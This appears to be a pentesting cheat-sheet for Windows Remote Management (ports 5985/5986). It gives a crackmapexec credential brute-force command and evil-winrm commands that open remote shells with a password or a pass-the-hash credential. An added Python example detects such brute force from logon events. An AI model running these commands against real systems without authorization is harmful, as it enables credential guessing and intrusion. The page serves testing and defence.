5985,5986 - Pentesting WinRM


WinRM is short for Windows Remote Management, a protocol for remote management of Windows systems. It provides a secure and standards-based way for administrators to remotely manage Windows servers, workstations, and other resources, either from the command line or through automation tools such as PowerShell.


bruteforce user / password

crackmapexec winrm $IP -u users.txt -p pass.txt --continue-on-success
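
On the defender's side, list-based guessing like the command above appears as a burst of failed network logons from one source across several accounts, and with --continue-on-success the burst keeps going after a valid pair is found. The following is an added detection example, not part of the original page; the CSV layout, sample rows, thresholds and function name are assumptions (4625/4624 are the Windows failed/successful logon event IDs, logon type 3 is a network logon).

```python
import csv
import io
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample: simplified export of Security log events (not raw Windows format).
# 4625 = failed logon, 4624 = successful logon; logon type 3 = network (used by WinRM).
SAMPLE = """time,event_id,logon_type,user,src_ip
2024-05-01T10:00:01,4625,3,alice,10.0.0.50
2024-05-01T10:00:02,4625,3,bob,10.0.0.50
2024-05-01T10:00:03,4625,3,carol,10.0.0.50
2024-05-01T10:00:04,4625,3,alice,10.0.0.50
2024-05-01T10:00:05,4624,3,bob,10.0.0.50
2024-05-01T10:00:06,4625,3,carol,10.0.0.50
2024-05-01T10:03:00,4625,3,dave,10.0.0.77
2024-05-01T11:30:00,4624,3,dave,10.0.0.77
"""

def detect_bruteforce(log_text, window=timedelta(minutes=5), min_failures=4, min_users=3):
    """Return one alert per source IP whose failed network logons within
    `window` reach both thresholds (thresholds are illustrative assumptions)."""
    by_src = defaultdict(list)
    for row in csv.DictReader(io.StringIO(log_text)):
        if row["logon_type"] != "3" or row["event_id"] not in ("4624", "4625"):
            continue
        by_src[row["src_ip"]].append(
            (datetime.fromisoformat(row["time"]), row["event_id"], row["user"]))
    alerts = []
    for src, events in by_src.items():
        events.sort()
        failures = [(t, u) for t, eid, u in events if eid == "4625"]
        for i, (start, _) in enumerate(failures):
            in_window = [(t, u) for t, u in failures[i:] if t - start <= window]
            users = {u for _, u in in_window}
            if len(in_window) >= min_failures and len(users) >= min_users:
                # A success from the same source during the burst marks a likely guessed account.
                hits = sorted({u for t, eid, u in events
                               if eid == "4624" and start <= t <= start + window})
                alerts.append({"src_ip": src, "failures": len(in_window),
                               "users_tried": sorted(users), "compromised": hits})
                break  # one alert per source
    return alerts

if __name__ == "__main__":
    for alert in detect_bruteforce(SAMPLE):
        print(alert)
```

An account listed under "compromised" should have its password reset and its sessions reviewed, since the same credentials work for the interactive logons shown further down.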


evil-winrm - with password

evil-winrm -u $USER -p $PASS -i $IP


evil-winrm - with hash

evil-winrm -u <username> -H <Hash> -i <IP>